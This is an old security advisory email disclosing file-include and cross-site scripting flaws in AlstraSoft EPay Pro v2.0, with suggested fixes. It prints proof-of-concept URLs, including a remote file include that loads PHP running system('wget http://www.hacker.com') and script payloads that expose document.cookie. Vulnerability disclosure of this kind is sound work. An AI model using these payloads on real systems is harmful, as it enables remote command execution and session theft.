This is a multi-part message in MIME format. ------=_NextPart_000_0012_01C53726.5C0BF6A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Severity: High Title: AlstraSoft EPay Pro v2.0 has file include and multiple xss = vulnerabilities Date: 02/04/2005 Vendor: AlstraSoft Vendor Website: http://www.alstrasoft.com Summary: Alstrasoft epay pro v2. has file include and multiple xss = vulnerabilities. Proof of Concept Exploits:=20 http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com? File include vulnerability Instead of www.whatismyip.com if we replaced that with suppose evil.php = on www.server.com which contained evil code such as and we ran, = http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil it = would execute the command and thus this can lead to arbitary command = execution. http://localhost/epal/?order_num=3Dcrap&payment=3D">&send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexp= ress Pops cookie http://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3D= regular&send=3Dpriority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/= script%3E Pops cookie Possible Fixes: The usage of htmlspeacialchars(), and using a base = directory for file include would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. Diabolic Crab's Security Services: Contact at = dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web = application securing services, along with programming in php, vb, asp, = c, c++, perl, java, html and graphic designing. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd vW9dOgM7AoFDa/JaMgMjaisw =3Dsb0J -----END PGP SIGNATURE----- ------=_NextPart_000_0012_01C53726.5C0BF6A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1
 
Dcrab 's Security Advisory
[Hsc = Security Group]=20 http://www.hackerscenter.com/<= BR>[dP=20 Security] http://digitalparadox.org/
=
 
Severity: High
Title: AlstraSoft = EPay Pro v2.0=20 has file include and multiple xss vulnerabilities
Date:=20 02/04/2005
 
Vendor: AlstraSoft
Vendor Website: = http://www.alstrasoft.com
Summa= ry:=20 Alstrasoft epay pro v2. has file include and multiple xss=20 vulnerabilities.
 
Proof of Concept Exploits: =
 
http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com?File=20 include vulnerability
 
Instead of www.whatismyip.com if we replaced = that with=20 suppose evil.php on www.server.com = which=20 contained evil code such as
<?
system('wget http://www.hacker.com");
?>
a= nd we=20 ran, http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil=20 it would execute the command and thus this can lead to arbitary command=20 execution.
 

&send=3Dfirst&send=3Dregular&se= nd=3Dpriority&send=3Dexpress'>http://localhost/epal/?order_num=3Dcrap= &payment=3D"><script>alert(document.cookie)</script>&a= mp;send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexpress=
Pops=20 cookie
 

http://localhost/epal/?order_num= =3Dcrap&payment=3Dcrap&send=3Dfirst&send=3Dregular&send=3D= priority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops=20 cookie
 

Possible Fixes: The usage of htmlspeacialchars(), and using a = base=20 directory for file include would solve these problems.
 
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h
 
Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://digitalparadox.org/. = Lookout for my=20 soon to come out book on Secure coding with php.
 
Diabolic Crab's Security Services: Contact at=20 dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20 application securing services, along with programming in php, vb, asp, = c, c++,=20 perl, java, html and graphic designing.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com
 
iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd
= vW9dOgM7AoFDa/JaMgMjaisw
=3Dsb0J
-----END=20 PGP SIGNATURE-----
 
------=_NextPart_000_0012_01C53726.5C0BF6A0--